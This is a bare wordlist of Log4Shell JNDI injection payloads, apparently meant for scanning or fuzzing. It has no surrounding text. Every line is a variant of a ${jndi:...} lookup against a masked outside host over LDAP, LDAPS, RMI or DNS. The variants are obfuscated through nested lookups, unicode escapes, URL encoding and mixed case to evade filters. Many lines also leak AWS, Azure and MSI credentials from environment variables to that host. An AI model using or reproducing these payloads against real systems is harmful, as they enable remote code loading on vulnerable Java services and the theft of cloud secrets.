${jndi:ldap://****/z}
${jndi:ldaps://****}
${jndi:rmi://****}
${jndi:dns://****}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//****/z}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}daps${env:ENV_NAME:-:}//****/z}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-r}mi${env:ENV_NAME:-:}//****/z}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-d}ns${env:ENV_NAME:-:}//****/z}
${jndi:ldap://****/z?leak=${env:AWS_ACCESS_KEY_ID:-NO_EXISTS}}
${jndi:ldap://****/z?leak=${env:AWS_SECRET_ACCESS_KEY:-NO_EXISTS}}
${jndi:ldap://****/z?leak=${env:AMAZON_AWS_ACCESS_KEY_ID:-NO_EXISTS}}
${jndi:ldap://****/z?leak=${env:AMAZON_AWS_SECRET_ACCESS_KEY:-NO_EXISTS}}
${jndi:ldap://****/z?leak=${env:AZURE_CLIENT_ID:-NO_EXISTS}}
${jndi:ldap://****/z?leak=${env:AZURE_CLIENT_SECRET:-NO_EXISTS}}
${jndi:ldap://****/z?leak=${env:AZURE_USERNAME:-NO_EXISTS}}
${jndi:ldap://****/z?leak=${env:AZURE_PASSWORD:-NO_EXISTS}}
${jndi:ldap://****/z?leak=${env:MSI_ENDPOINT:-NO_EXISTS}}
${jndi:ldap://****/z?leak=${env:MSI_SECRET:-NO_EXISTS}}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://****/z}
${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://****/z}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://****/z}
${jnd${sys:SYS_NAME:-i}:ldap:/****/z}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://****/z}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://****/z}
${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:ldap://****/z}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}${lower:s}://****/z}
${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}${upper:s}://****/z}
${${lower:j}ndi:${lower:r}${lower:m}a${lower:i}://****/z}
${${upper:j}ndi:${upper:r}${upper:m}a${lower:i}://****/z}
${${lower:j}ndi:${lower:d}${lower:n}a${lower:s}://****/z}
${${upper:j}ndi:${upper:d}${upper:n}a${lower:s}://****/z}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}${::-s}://****/z}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://****/z}
${${::-j}${::-n}${::-d}${::-i}:${::-d}${::-n}${::-s}://****/z}
${jnd${sys:SYS_NAME:-i}:ldap:/****/z}
${jnd${sys:SYS_NAME:-i}:ldaps:/****/z}
${jnd${sys:SYS_NAME:-i}:rmi:/****/z}
${jnd${sys:SYS_NAME:-i}:dns:/****/z}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://****/z}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldaps://****/z}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:rmi://****/z}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:dns://****/z}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}${date:'s'}://****/z}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'r'}${date:'m'}${date:'i'}://****/z}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'d'}${date:'n'}${date:'s'}://****/z}
${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:ldaps://****/z}
${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:rmi://****/z}
${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:dns://****/z}
${\u006a\u006e\u0064\u0069:ldap://****/z}
${\u006a\u006e\u0064\u0069:ldaps://****/z}
${\u006a\u006e\u0064\u0069:rmi://****/z}
${\u006a\u006e\u0064\u0069:dns://****/z}
${jndi:ldap://127.0.0.1#****/z}
${jndi:ldaps://127.0.0.1#****/z}
${jndi:rmi://127.0.0.1#****/z}
${jndi:dns://127.0.0.1#****/z}
%24%7bjndi:ldap://****/z%7d
%24%7bjndi:ldaps://****%7d
%24%7bjndi:rmi://****%7d
%24%7bjndi:dns://****%7d
%24%7b%24%7benv:ENV_NAME:-j%7dndi%24%7benv:ENV_NAME:-:%7d%24%7benv:ENV_NAME:-l%7ddap%24%7benv:ENV_NAME:-:%7d//****/z%7d
%24%7b%24%7benv:ENV_NAME:-j%7dndi%24%7benv:ENV_NAME:-:%7d%24%7benv:ENV_NAME:-l%7ddaps%24%7benv:ENV_NAME:-:%7d//****/z%7d
%24%7b%24%7benv:ENV_NAME:-j%7dndi%24%7benv:ENV_NAME:-:%7d%24%7benv:ENV_NAME:-r%7dmi%24%7benv:ENV_NAME:-:%7d//****/z%7d
%24%7b%24%7benv:ENV_NAME:-j%7dndi%24%7benv:ENV_NAME:-:%7d%24%7benv:ENV_NAME:-d%7dns%24%7benv:ENV_NAME:-:%7d//****/z%7d
%24%7bjndi:ldap://****/z?leak=%24%7benv:AWS_ACCESS_KEY_ID:-NO_EXISTS%7d%7d
%24%7bjndi:ldap://****/z?leak=%24%7benv:AWS_SECRET_ACCESS_KEY:-NO_EXISTS%7d%7d
%24%7bjndi:ldap://****/z?leak=%24%7benv:AMAZON_AWS_ACCESS_KEY_ID:-NO_EXISTS%7d%7d
%24%7bjndi:ldap://****/z?leak=%24%7benv:AMAZON_AWS_SECRET_ACCESS_KEY:-NO_EXISTS%7d%7d
%24%7bjndi:ldap://****/z?leak=%24%7benv:AZURE_CLIENT_ID:-NO_EXISTS%7d%7d
%24%7bjndi:ldap://****/z?leak=%24%7benv:AZURE_CLIENT_SECRET:-NO_EXISTS%7d%7d
%24%7bjndi:ldap://****/z?leak=%24%7benv:AZURE_USERNAME:-NO_EXISTS%7d%7d
%24%7bjndi:ldap://****/z?leak=%24%7benv:AZURE_PASSWORD:-NO_EXISTS%7d%7d
%24%7bjndi:ldap://****/z?leak=%24%7benv:MSI_ENDPOINT:-NO_EXISTS%7d%7d
%24%7bjndi:ldap://****/z?leak=%24%7benv:MSI_SECRET:-NO_EXISTS%7d%7d
%24%7b%24%7blower:j%7dndi:%24%7blower:l%7d%24%7blower:d%7da%24%7blower:p%7d://****/z%7d
%24%7b%24%7bupper:j%7dndi:%24%7bupper:l%7d%24%7bupper:d%7da%24%7blower:p%7d://****/z%7d
%24%7b%24%7b::-j%7d%24%7b::-n%7d%24%7b::-d%7d%24%7b::-i%7d:%24%7b::-l%7d%24%7b::-d%7d%24%7b::-a%7d%24%7b::-p%7d://****/z%7d
%24%7bjnd%24%7bsys:SYS_NAME:-i%7d:ldap:/****/z%7d
%24%7bj%24%7b%24%7b:-l%7d%24%7b:-o%7d%24%7b:-w%7d%24%7b:-e%7d%24%7b:-r%7d:n%7ddi:ldap://****/z%7d
%24%7b%24%7bdate:'j'%7d%24%7bdate:'n'%7d%24%7bdate:'d'%7d%24%7bdate:'i'%7d:%24%7bdate:'l'%7d%24%7bdate:'d'%7d%24%7bdate:'a'%7d%24%7bdate:'p'%7d://****/z%7d
%24%7b%24%7bwhat:ever:-j%7d%24%7bsome:thing:-n%7d%24%7bother:thing:-d%7d%24%7band:last:-i%7d:ldap://****/z%7d
%24%7b%24%7blower:j%7dndi:%24%7blower:l%7d%24%7blower:d%7da%24%7blower:p%7d%24%7blower:s%7d://****/z%7d
%24%7b%24%7bupper:j%7dndi:%24%7bupper:l%7d%24%7bupper:d%7da%24%7blower:p%7d%24%7bupper:s%7d://****/z%7d
%24%7b%24%7blower:j%7dndi:%24%7blower:r%7d%24%7blower:m%7da%24%7blower:i%7d://****/z%7d
%24%7b%24%7bupper:j%7dndi:%24%7bupper:r%7d%24%7bupper:m%7da%24%7blower:i%7d://****/z%7d
%24%7b%24%7blower:j%7dndi:%24%7blower:d%7d%24%7blower:n%7da%24%7blower:s%7d://****/z%7d
%24%7b%24%7bupper:j%7dndi:%24%7bupper:d%7d%24%7bupper:n%7da%24%7blower:s%7d://****/z%7d
%24%7b%24%7b::-j%7d%24%7b::-n%7d%24%7b::-d%7d%24%7b::-i%7d:%24%7b::-l%7d%24%7b::-d%7d%24%7b::-a%7d%24%7b::-p%7d%24%7b::-s%7d://****/z%7d
%24%7b%24%7b::-j%7d%24%7b::-n%7d%24%7b::-d%7d%24%7b::-i%7d:%24%7b::-r%7d%24%7b::-m%7d%24%7b::-i%7d://****/z%7d
%24%7b%24%7b::-j%7d%24%7b::-n%7d%24%7b::-d%7d%24%7b::-i%7d:%24%7b::-d%7d%24%7b::-n%7d%24%7b::-s%7d://****/z%7d
%24%7bjnd%24%7bsys:SYS_NAME:-i%7d:ldap:/****/z%7d
%24%7bjnd%24%7bsys:SYS_NAME:-i%7d:ldaps:/****/z%7d
%24%7bjnd%24%7bsys:SYS_NAME:-i%7d:rmi:/****/z%7d
%24%7bjnd%24%7bsys:SYS_NAME:-i%7d:dns:/****/z%7d
%24%7bj%24%7b%24%7b:-l%7d%24%7b:-o%7d%24%7b:-w%7d%24%7b:-e%7d%24%7b:-r%7d:n%7ddi:ldap://****/z%7d
%24%7bj%24%7b%24%7b:-l%7d%24%7b:-o%7d%24%7b:-w%7d%24%7b:-e%7d%24%7b:-r%7d:n%7ddi:ldaps://****/z%7d
%24%7bj%24%7b%24%7b:-l%7d%24%7b:-o%7d%24%7b:-w%7d%24%7b:-e%7d%24%7b:-r%7d:n%7ddi:rmi://****/z%7d
%24%7bj%24%7b%24%7b:-l%7d%24%7b:-o%7d%24%7b:-w%7d%24%7b:-e%7d%24%7b:-r%7d:n%7ddi:dns://****/z%7d
%24%7b%24%7bdate:'j'%7d%24%7bdate:'n'%7d%24%7bdate:'d'%7d%24%7bdate:'i'%7d:%24%7bdate:'l'%7d%24%7bdate:'d'%7d%24%7bdate:'a'%7d%24%7bdate:'p'%7d%24%7bdate:'s'%7d://****/z%7d
%24%7b%24%7bdate:'j'%7d%24%7bdate:'n'%7d%24%7bdate:'d'%7d%24%7bdate:'i'%7d:%24%7bdate:'r'%7d%24%7bdate:'m'%7d%24%7bdate:'i'%7d://****/z%7d
%24%7b%24%7bdate:'j'%7d%24%7bdate:'n'%7d%24%7bdate:'d'%7d%24%7bdate:'i'%7d:%24%7bdate:'d'%7d%24%7bdate:'n'%7d%24%7bdate:'s'%7d://****/z%7d
%24%7b%24%7bwhat:ever:-j%7d%24%7bsome:thing:-n%7d%24%7bother:thing:-d%7d%24%7band:last:-i%7d:ldaps://****/z%7d
%24%7b%24%7bwhat:ever:-j%7d%24%7bsome:thing:-n%7d%24%7bother:thing:-d%7d%24%7band:last:-i%7d:rmi://****/z%7d
%24%7b%24%7bwhat:ever:-j%7d%24%7bsome:thing:-n%7d%24%7bother:thing:-d%7d%24%7band:last:-i%7d:dns://****/z%7d
%24%7b\u006a\u006e\u0064\u0069:ldap://****/z%7d
%24%7b\u006a\u006e\u0064\u0069:ldaps://****/z%7d
%24%7b\u006a\u006e\u0064\u0069:rmi://****/z%7d
%24%7b\u006a\u006e\u0064\u0069:dns://****/z%7d
%24%7bjndi:ldap://127.0.0.1#****/z%7d
%24%7bjndi:ldaps://127.0.0.1#****/z%7d
%24%7bjndi:rmi://127.0.0.1#****/z%7d
%24%7bjndi:dns://127.0.0.1#****/z%7d
${jNdi:ldAp://****/Z}
${jnDI:ldApS://****}
${JNDI:Rmi://****}
${JnDi:DNs://****}
${${EnV:ENV_NaME:-j}nDI${EnV:EnV_namE:-:}${ENV:EnV_nAME:-L}Dap${enV:Env_naMe:-:}//****/Z}
${${Env:Env_namE:-j}NDi${eNV:Env_nAMe:-:}${EnV:Env_NamE:-L}DApS${ENv:eNv_name:-:}//****/Z}
${${eNv:ENV_Name:-j}NDi${eNv:eNv_nAmE:-:}${EnV:env_namE:-r}Mi${eNv:Env_namE:-:}//****/z}
${${Env:ENv_nAmE:-J}NdI${eNv:eNv_name:-:}${EnV:EnV_nAmE:-D}Ns${eNV:env_Name:-:}//****/Z}
${JnDi:LDap://****/Z?LeAK=${env:AwS_acceSs_key_Id:-NO_eXIsTS}}
${Jndi:LdAP://****/Z?LeAK=${ENv:AWS_SecREt_AccESS_KEy:-nO_ExIsTS}}
${jNdi:LdAp://****/Z?leAK=${ENV:AMazon_AWS_accESs_keY_Id:-no_EXistS}}
${jndi:LDAP://****/z?LEAK=${enV:amazON_AWs_seCrET_ACCEss_KEy:-No_eXIstS}}
${jnDI:lDaP://****/z?lEAK=${eNV:azUre_clIent_ID:-nO_exists}}
${jndI:LDAP://****/z?LeAK=${enV:AZURe_clIent_secRet:-nO_EXIstS}}
${Jndi:LDAP://****/Z?LEaK=${eNV:AzuRe_userNaMe:-NO_ExisTS}}
${jNDI:LDaP://****/Z?LEAk=${enV:AzuRe_PassworD:-no_EXisTS}}
${jNDi:LDaP://****/Z?LEak=${eNV:MSi_eNdPOInT:-no_eXIsTS}}
${jNDi:LDaP://****/Z?LeaK=${Env:msi_seCrET:-no_eXIsTS}}
${${lOWeR:j}NdI:${lOwER:l}${LoweR:d}A${LOWER:P}://****/z}
${${uPPeR:j}nDi:${upper:l}${upPER:D}A${LOweR:P}://****/z}
${${::-J}${::-N}${::-D}${::-i}:${::-l}${::-D}${::-A}${::-p}://****/z}
${jnd${syS:SYs_NAme:-i}:lDAP:/****/Z}
${J${${:-l}${:-O}${:-w}${:-E}${:-R}:N}Di:LdAp://****/z}
${${DAte:'j'}${DatE:'N'}${dAtE:'d'}${DAtE:'i'}:${dAtE:'l'}${DATe:'d'}${DaTe:'a'}${dAte:'p'}://****/Z}
${${whAT:ever:-j}${SoMe:Thing:-n}${oTHER:tHing:-D}${And:LaST:-I}:LDAp://****/Z}
${${LOWEr:J}nDi:${lOWER:l}${lowEr:d}a${lOWeR:p}${lOWEr:S}://****/Z}
${${uPpeR:j}NDi:${UpPeR:L}${uPPEr:d}A${LOwEr:P}${UppeR:S}://****/Z}
${${LoWER:J}nDI:${Lower:r}${LoWer:m}a${LoWER:I}://****/Z}
${${uPPer:J}nDi:${Upper:r}${upPeR:m}A${lowER:I}://****/Z}
${${LowER:j}ndi:${lowER:d}${lOWER:n}A${lOWer:s}://****/Z}
${${Upper:J}ndi:${upPeR:D}${uppEr:N}a${lOwer:s}://****/z}
${${::-j}${::-n}${::-D}${::-I}:${::-L}${::-D}${::-A}${::-P}${::-S}://****/z}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-M}${::-I}://****/z}
${${::-j}${::-n}${::-d}${::-i}:${::-D}${::-N}${::-s}://****/Z}
${Jnd${sYS:sYS_naME:-I}:lDaP:/****/z}
${JND${sYS:SYs_name:-i}:lDaps:/****/Z}
${jnD${sYS:Sys_NAmE:-I}:rmi:/****/z}
${JNd${sys:sYS_NAMe:-i}:Dns:/****/z}
${j${${:-l}${:-O}${:-w}${:-E}${:-r}:N}di:lDAp://****/z}
${j${${:-l}${:-o}${:-w}${:-E}${:-r}:N}di:LDAPS://****/Z}
${j${${:-l}${:-o}${:-w}${:-e}${:-R}:n}dI:RMI://****/z}
${J${${:-L}${:-O}${:-w}${:-e}${:-R}:n}Di:dNs://****/Z}
${${dATE:'j'}${datE:'N'}${datE:'D'}${datE:'i'}:${datE:'L'}${dATE:'d'}${dATE:'A'}${Date:'p'}${dAte:'s'}://****/z}
${${DATE:'j'}${datE:'n'}${dAtE:'D'}${daTe:'I'}:${DATE:'r'}${DAtE:'m'}${dATE:'i'}://****/Z}
${${DATe:'j'}${Date:'N'}${Date:'d'}${date:'i'}:${datE:'d'}${dATe:'N'}${dAte:'s'}://****/z}
${${whAT:EvER:-J}${SOme:THing:-N}${oThEr:ThinG:-d}${and:LaSt:-I}:lDaps://****/Z}
${${wHaT:EVER:-j}${SOme:tHINg:-N}${oThEr:tHIng:-D}${anD:lAsT:-i}:rMI://****/Z}
${${wHAt:Ever:-j}${sOmE:tHIng:-n}${otHEr:tHINg:-d}${aND:LAST:-I}:DnS://****/z}
${\u006a\u006E\U0064\U0069:LdaP://****/z}
${\u006a\u006E\U0064\U0069:LDaPS://****/Z}
${\U006a\u006E\U0064\U0069:Rmi://****/Z}
${\U006a\U006e\U0064\U0069:dNs://****/Z}
${jndI:LDap://127.0.0.1#****/z}
${Jndi:LdApS://127.0.0.1#****/Z}
${JndI:RMI://127.0.0.1#****/Z}
${jnDI:dnS://127.0.0.1#****/Z}
%24%7bjndI:lDAp://****/Z%7d
%24%7BJnDI:ldaps://****%7D
%24%7BjNDI:RMi://****%7d
%24%7BjNDI:Dns://****%7d
%24%7b%24%7bENV:ENV_NaME:-J%7DNDI%24%7bEnv:enV_namE:-:%7D%24%7beNv:enV_NAME:-l%7DDap%24%7benV:EnV_Name:-:%7d//****/z%7D
%24%7B%24%7BeNV:Env_nAmE:-j%7DNDi%24%7beNV:eNV_name:-:%7d%24%7bENV:eNV_NAmE:-L%7Ddaps%24%7BeNV:eNV_nAME:-:%7d//****/z%7D
%24%7B%24%7bEnV:env_name:-j%7dNdI%24%7BenV:eNv_NAme:-:%7d%24%7benV:enV_name:-R%7dmI%24%7bENv:eNV_naME:-:%7D//****/z%7D
%24%7B%24%7beNv:env_NaMe:-J%7dndI%24%7bENV:eNv_Name:-:%7D%24%7BeNV:ENV_naME:-d%7dNs%24%7BeNV:eNV_name:-:%7d//****/Z%7D
%24%7BJnDi:ldAP://****/Z?LEaK=%24%7bEnV:Aws_ACceSS_KEy_ID:-NO_EXiSts%7D%7D
%24%7bJNdI:ldAp://****/Z?LeaK=%24%7BENv:aWS_secreT_acCESs_Key:-nO_eXisTS%7d%7D
%24%7bJNDI:lDaP://****/z?LeAK=%24%7BeNV:aMAzOn_AWs_ACcess_Key_Id:-nO_exIsTs%7d%7D
%24%7bjndI:LdAp://****/Z?LeaK=%24%7bEnV:AmAzON_awS_sECrET_AcceSS_KEY:-NO_exiSTS%7d%7d
%24%7BJnDI:ldAP://****/Z?leaK=%24%7bEnv:AZuRe_clieNT_ID:-No_eXIsts%7d%7D
%24%7Bjndi:LdAP://****/Z?LeAK=%24%7bEnV:aZURE_cLIEnt_sEcrEt:-no_ExISTS%7D%7D
%24%7BJndI:lDap://****/Z?LeAK=%24%7Benv:azURE_UseRname:-No_EXISTs%7d%7D
%24%7BJndi:lDap://****/Z?lEAk=%24%7benv:AzURe_PASsword:-no_EXIsts%7d%7D
%24%7BJnDi:LdAp://****/z?LEAK=%24%7Benv:mSi_ENDPOiNt:-nO_eXisTS%7d%7d
%24%7BjNdi:LDAP://****/Z?leaK=%24%7beNv:MSI_secret:-NO_exIsTs%7d%7D
%24%7B%24%7BLOweR:j%7dNdI:%24%7BLOWer:L%7d%24%7BlOWEr:d%7Da%24%7BLOWeR:P%7d://****/Z%7D
%24%7b%24%7BupPEr:J%7dndi:%24%7BUpPEr:l%7D%24%7buPpeR:d%7da%24%7BlOweR:P%7D://****/Z%7d
%24%7b%24%7B::-J%7D%24%7b::-N%7D%24%7b::-D%7d%24%7B::-i%7d:%24%7B::-L%7D%24%7b::-d%7D%24%7b::-A%7D%24%7b::-P%7d://****/z%7d
%24%7BJnd%24%7bSyS:sys_name:-i%7d:LDap:/****/Z%7D
%24%7bJ%24%7b%24%7B:-L%7D%24%7B:-O%7D%24%7B:-W%7d%24%7B:-e%7D%24%7b:-R%7D:n%7dDi:lDap://****/z%7d
%24%7b%24%7bdaTE:'j'%7D%24%7bDate:'n'%7D%24%7BdaTe:'D'%7d%24%7bdaTe:'i'%7d:%24%7bDATe:'L'%7d%24%7BdAtE:'D'%7d%24%7BdaTe:'a'%7d%24%7bdaTe:'P'%7D://****/Z%7D
%24%7B%24%7bWHAt:EVEr:-j%7d%24%7bsoMe:thING:-N%7D%24%7bOtHER:Thing:-d%7D%24%7bAnD:LaST:-I%7d:LdaP://****/z%7d
%24%7b%24%7BlOWer:j%7dndI:%24%7BLoWEr:l%7d%24%7BLoWer:d%7DA%24%7BlOWeR:P%7D%24%7Blower:S%7D://****/Z%7d
%24%7B%24%7buppeR:J%7dNdi:%24%7BuPPEr:l%7d%24%7BUPpER:D%7DA%24%7blOWEr:p%7D%24%7BUpPeR:s%7D://****/z%7d
%24%7b%24%7BlowER:J%7dNdI:%24%7blOwer:r%7d%24%7blOWER:m%7dA%24%7blowEr:i%7D://****/z%7d
%24%7b%24%7BUpPer:j%7dndi:%24%7buPpER:r%7d%24%7bUppEr:m%7Da%24%7BLOWER:I%7d://****/Z%7d
%24%7b%24%7bLoWer:J%7DNdi:%24%7BLOWeR:D%7D%24%7BlOWer:n%7da%24%7blOwer:S%7D://****/z%7D
%24%7b%24%7BuppER:J%7DNDI:%24%7buppeR:D%7d%24%7buPpeR:n%7DA%24%7bLOwer:S%7D://****/Z%7d
%24%7B%24%7B::-J%7d%24%7B::-n%7D%24%7b::-d%7D%24%7B::-i%7D:%24%7B::-L%7D%24%7b::-d%7D%24%7b::-A%7D%24%7b::-P%7d%24%7b::-s%7D://****/z%7d
%24%7B%24%7B::-j%7D%24%7B::-n%7d%24%7B::-D%7d%24%7B::-i%7d:%24%7b::-R%7d%24%7B::-m%7D%24%7B::-I%7D://****/Z%7D
%24%7B%24%7B::-J%7D%24%7B::-n%7d%24%7b::-d%7D%24%7B::-i%7d:%24%7B::-D%7d%24%7b::-n%7D%24%7B::-S%7d://****/z%7D
%24%7bjnd%24%7bSyS:SYS_nAMe:-i%7d:LdAP:/****/z%7D
%24%7BJnd%24%7bsYS:sYs_namE:-I%7d:LdaPs:/****/z%7D
%24%7bJnd%24%7BSYs:SyS_naME:-I%7D:RmI:/****/Z%7d
%24%7bJNd%24%7BsyS:SyS_Name:-I%7d:DNs:/****/Z%7D
%24%7Bj%24%7B%24%7b:-l%7D%24%7b:-o%7D%24%7b:-w%7D%24%7b:-e%7d%24%7b:-r%7d:n%7DDi:LdAp://****/Z%7d
%24%7Bj%24%7B%24%7B:-l%7D%24%7B:-O%7D%24%7B:-w%7D%24%7B:-E%7d%24%7b:-R%7d:N%7Ddi:lDaPS://****/z%7D
%24%7bj%24%7b%24%7B:-L%7D%24%7B:-o%7d%24%7B:-W%7d%24%7B:-e%7D%24%7b:-r%7d:N%7DDI:rmI://****/z%7d
%24%7bJ%24%7b%24%7b:-L%7d%24%7b:-O%7D%24%7B:-W%7d%24%7B:-E%7D%24%7B:-r%7D:N%7dDI:Dns://****/Z%7D
%24%7B%24%7bDaTe:'J'%7d%24%7BDAtE:'N'%7D%24%7BDAtE:'D'%7D%24%7BDATE:'i'%7D:%24%7bDatE:'L'%7D%24%7BDaTE:'d'%7d%24%7bDATE:'A'%7D%24%7BdAtE:'P'%7D%24%7bDate:'s'%7D://****/z%7D
%24%7b%24%7BdaTe:'J'%7d%24%7bDaTE:'n'%7d%24%7BdATE:'d'%7d%24%7bdatE:'i'%7D:%24%7BdaTE:'R'%7D%24%7bdaTe:'m'%7d%24%7bDate:'i'%7d://****/z%7D
%24%7b%24%7BDate:'j'%7d%24%7BdATe:'n'%7d%24%7BdATE:'D'%7D%24%7bDatE:'i'%7D:%24%7BdATe:'d'%7d%24%7BDAte:'N'%7D%24%7BdatE:'S'%7D://****/Z%7d
%24%7b%24%7bwhAT:eVER:-J%7D%24%7bsOMe:THiNg:-N%7d%24%7boTher:THiNG:-D%7D%24%7baND:lASt:-i%7D:ldaPS://****/Z%7D
%24%7B%24%7bWhat:EVER:-j%7d%24%7BSome:Thing:-n%7d%24%7BOthEr:thiNG:-d%7d%24%7baND:LaSt:-i%7D:RMi://****/Z%7D
%24%7b%24%7bWHaT:eVER:-J%7d%24%7bSomE:ThIng:-N%7d%24%7BOtHER:ThING:-d%7D%24%7Band:LAST:-I%7D:DnS://****/z%7D
%24%7B\u006a\U006e\u0064\u0069:ldAP://****/Z%7d
%24%7b\u006a\u006E\u0064\U0069:LDapS://****/Z%7D
%24%7b\u006a\u006e\u0064\u0069:Rmi://****/Z%7D
%24%7B\u006A\u006E\U0064\U0069:DnS://****/z%7d
%24%7BjNdi:LDAP://127.0.0.1#****/z%7d
%24%7BJnDI:LdAPs://127.0.0.1#****/Z%7D
%24%7Bjndi:Rmi://127.0.0.1#****/Z%7D
%24%7BjNdi:dNS://127.0.0.1#****/z%7d
